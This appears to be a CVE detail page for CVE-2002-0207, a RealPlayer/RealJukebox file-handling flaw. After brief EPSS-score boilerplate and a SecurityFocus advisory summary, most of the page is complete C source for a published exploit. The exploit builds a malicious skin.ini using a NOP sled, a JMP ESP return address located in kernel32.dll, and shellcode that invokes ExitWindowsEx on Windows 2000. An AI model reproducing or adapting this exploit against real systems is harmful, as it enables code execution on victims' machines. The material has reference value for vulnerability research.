CVE-2002-0207 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/3809/info RealPlayer is a software package distributed and maintained by Real Media. It is available for Microsoft Windows, Unix, and Linux. A problem with the handling of file format may make it possible to remotely crash RealPlayer. The problem could also potentially result in code execution. Upon receiving a file with a malformed header, it is possible to crash the RealPlayer client. A file that specifies a content length greater than the actual size creates a circumstance where RealPlayer reacts unpredictably and becomes unstable. This usually results in the crashing of RealPlayer. This problem may also make it possible to execute arbitrary code. /*=========================================================== RealJukebox2 1.0.2.379 Exploit for Windows Windows2000 Professional (Service Pack 2) The Shadow Penguin Security (http://www.shadowpenguin.org) Written by UNYUN (unyun@shadowpenguin.org) ============================================================ */ #include <stdio.h> #include <windows.h> #define MAXBUF 4096 #define KERNEL_NAME "kernel32.dll" #define SKIN_INI "skin.ini" #define INI_FILE \ "[MAIN]\n"\ "Application=RealJukebox\n"\ "Version=2\n"\ "SkinFamilyCount=5\n"\ "\n"\ "CONTROL1Image=%s\n" #define NOP 0x90 #define FAKE_OFS1 36 #define FAKE_VAL1 0x7FFDF0F0 #define RETADR_OFS 28 #define CODE_OFS 60 #define RETADR_2000pro 0x77e0af64 static unsigned char egg_2000pro[512]={ 0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3, 0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD, 0x00 }; unsigned int search_mem(unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p<ed;p++) if (*p==c1 && *(p+1)==c2){ adr=(unsigned int)p; if ((adr&0xff)==0) continue; if (((adr>>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } void valset(char *buf,unsigned int val) { buf[0]=val&0xff; buf[1]=(val>>8)&0xff; buf[2]=(val>>16)&0xff; buf[3]=(val>>24)&0xff; } int main(int argc,char *argv[]) { FILE *fp; char buf[MAXBUF]; unsigned int tgt,exw; unsigned char *kp; if ((fp=fopen(SKIN_INI,"wb"))==NULL){ printf("Can not write file.\n"); exit(1); } memset(buf,NOP,sizeof(buf)); buf[sizeof(buf)-1]='\0'; if ((kp=(unsigned char *)LoadLibrary(KERNEL_NAME))==NULL){ printf("Can not find %s\n",KERNEL_NAME); exit(1); } tgt=search_mem(kp,kp+0x100000,0xff,0xe4); if (tgt==0) tgt=RETADR_2000pro; printf("kp = 0x%x\n",kp); printf("JMP ESP addr = 0x%x\n",tgt); exw=(unsigned int)ExitWindowsEx; printf("ExitWindowsEx = 0x%x\n",exw); valset(buf+FAKE_OFS1,FAKE_VAL1); valset(buf+RETADR_OFS,tgt); valset(egg_2000pro+1,exw); strncpy(buf+CODE_OFS,egg_2000pro,strlen(egg_2000pro)); fprintf(fp,INI_FILE,buf); fclose(fp); printf("Created '%s'.\n",SKIN_INI); return(0); }